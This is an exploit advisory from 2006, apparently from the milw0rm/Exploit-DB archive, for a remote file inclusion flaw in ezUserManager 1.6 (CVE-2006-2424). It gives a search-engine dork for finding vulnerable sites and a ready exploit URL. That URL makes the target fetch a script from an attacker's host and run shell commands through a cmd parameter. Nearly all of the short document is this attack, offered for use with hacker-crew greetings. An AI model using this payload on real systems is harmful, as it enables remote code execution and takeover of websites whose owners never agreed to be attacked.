ezUserManager <= 1.6 Remote File Inclusion Vulnerability

# Title: ezUserManager <= 1.6 Remote File Inclusion Vulnerability
# EDB-ID: 1795
# CVE-ID: (2006-2424)
# OSVDB-ID: (25540)
# Author: OLiBekaS
# Published: 2006-05-15
# Verified: yes
# Download Exploit Code
# Download N/A

Title       : ezUserManager <= v1.6 Remote File Inclusion Vulnerability
-
URL         : http://www.ezusermanager.com/
-
Dork        : "powered by ezUserManager"
-
Author      : OLiBekaS
-
contact     : olibekas[at]gmail.com
-
greetz      : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
Exploit     : http://[target]/[path]/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://[attacker]/cmd.txt?&cmd=ls

# milw0rm.com [2006-05-15]